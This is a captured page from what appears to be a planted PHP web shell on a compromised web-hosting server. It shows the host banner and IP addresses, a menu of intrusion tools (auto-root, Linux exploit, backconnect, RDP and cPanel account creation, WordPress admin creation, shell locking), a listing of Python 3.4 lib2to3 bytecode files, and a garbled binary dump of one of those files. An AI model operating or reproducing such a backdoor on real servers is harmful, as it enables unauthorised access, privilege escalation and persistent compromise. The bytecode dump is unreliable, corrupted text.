Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.15.144.132
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python34 /
lib64 /
python3.4 /
lib2to3 /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-34.pyc
136
B
-rw-r--r--
__init__.cpython-34.pyo
136
B
-rw-r--r--
__main__.cpython-34.pyc
233
B
-rw-r--r--
__main__.cpython-34.pyo
233
B
-rw-r--r--
btm_matcher.cpython-34.pyc
5.21
KB
-rw-r--r--
btm_matcher.cpython-34.pyo
5.21
KB
-rw-r--r--
btm_utils.cpython-34.pyc
6.68
KB
-rw-r--r--
btm_utils.cpython-34.pyo
6.68
KB
-rw-r--r--
fixer_base.cpython-34.pyc
6.38
KB
-rw-r--r--
fixer_base.cpython-34.pyo
6.38
KB
-rw-r--r--
fixer_util.cpython-34.pyc
13.1
KB
-rw-r--r--
fixer_util.cpython-34.pyo
13.1
KB
-rw-r--r--
main.cpython-34.pyc
9.03
KB
-rw-r--r--
main.cpython-34.pyo
8.99
KB
-rw-r--r--
patcomp.cpython-34.pyc
6.22
KB
-rw-r--r--
patcomp.cpython-34.pyo
5.93
KB
-rw-r--r--
pygram.cpython-34.pyc
1.23
KB
-rw-r--r--
pygram.cpython-34.pyo
1.23
KB
-rw-r--r--
pytree.cpython-34.pyc
26.37
KB
-rw-r--r--
pytree.cpython-34.pyo
25.53
KB
-rw-r--r--
refactor.cpython-34.pyc
22.39
KB
-rw-r--r--
refactor.cpython-34.pyo
22.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.cpython-34.pyc
� i f�- � @ s� d Z d d l m Z m Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l m Z d d � Z Gd d � d e j � Z d d � Z d d d � Z d S)z Main program for 2to3. � )�with_statement�print_functionN� )�refactorc C s: | j � } | j � } t j | | | | d d d d �S)z%Return a unified diff of two strings.z (original)z(refactored)Zlineterm� )� splitlines�difflibZunified_diff)�a�b�filename� r �1/opt/alt/python34/lib64/python3.4/lib2to3/main.py� diff_texts s r c s[ e Z d Z d Z d d d � f d d � Z d d � Z � f d d � Z d d � Z � S)�StdoutRefactoringToola2 A refactoring tool that can avoid overwriting its input files. Prints output to stdout. Output files can optionally be written to a different directory and or have an extra file suffix appended to their name for use in situations where you do not want to replace the input files. r c sv | | _ | | _ | r; | j t j � r; | t j 7} n | | _ | | _ | | _ t t | � j | | | � d S)aF Args: fixers: A list of fixers to import. options: A dict with RefactoringTool configuration. explicit: A list of fixers to run even if they are explicit. nobackups: If true no backup '.bak' files will be created for those files that are being refactored. show_diffs: Should diffs of the refactoring be printed to stdout? input_base_dir: The base directory for all input files. This class will strip this path prefix off of filenames before substituting it with output_dir. Only meaningful if output_dir is supplied. All files processed by refactor() must start with this path. output_dir: If supplied, all converted files will be written into this directory tree instead of input_base_dir. append_suffix: If supplied, all files output by this tool will have this appended to their filename. Useful for changing .py to .py3 for example by passing append_suffix='3'. N)� nobackups� show_diffs�endswith�os�sep�_input_base_dir�_output_dir�_append_suffix�superr �__init__) �selfZfixers�options�explicitr r �input_base_dir� output_dir� append_suffix)� __class__r r r $ s zStdoutRefactoringTool.__init__c O s3 | j j | | | f � | j j | | | � d S)N)�errors�append�logger�error)r �msg�args�kwargsr r r � log_errorA s zStdoutRefactoringTool.log_errorc ! s | } | j rk | j | j � rO t j j | j | t | j � d � � } qk t d | | j f � � n | j r� | | j 7} n | | k r� t j j | � } t j j | � s� t j | � n | j d | | � n | j s�| d } t j j | � rKy t j | � WqKt k rG} z | j d | � WYd d } ~ XqKXn y t j | | � Wq�t k r�} z | j d | | � WYd d } ~ Xq�Xn t t | � j } | | | | | � | j s�t j | | � n | | k r�t j | | � n d S)Nz5filename %s does not start with the input_base_dir %szWriting converted %s to %s.z.bakzCan't remove backup %szCan't rename %s to %s)r � startswithr r �path�join�len� ValueErrorr �dirname�isdir�makedirs�log_messager �lexists�remove�OSError�renamer r � write_file�shutilZcopymode) r Znew_textr Zold_text�encodingZ orig_filenamer Zbackup�err�write)r r r r6 E s@ &) z StdoutRefactoringTool.write_filec C s� | r | j d | � n� | j d | � | j r� t | | | � } yi | j d k r� | j �- x | D] } t | � qg Wt j j � Wd QXn x | D] } t | � q� WWq� t k r� t d | f � d SYq� Xn d S)NzNo changes to %sz Refactored %sz+couldn't encode %s's diff for your terminal) r1 r r Zoutput_lock�print�sys�stdout�flush�UnicodeEncodeError�warn)r �old�newr ZequalZ diff_lines�liner r r �print_outputl s"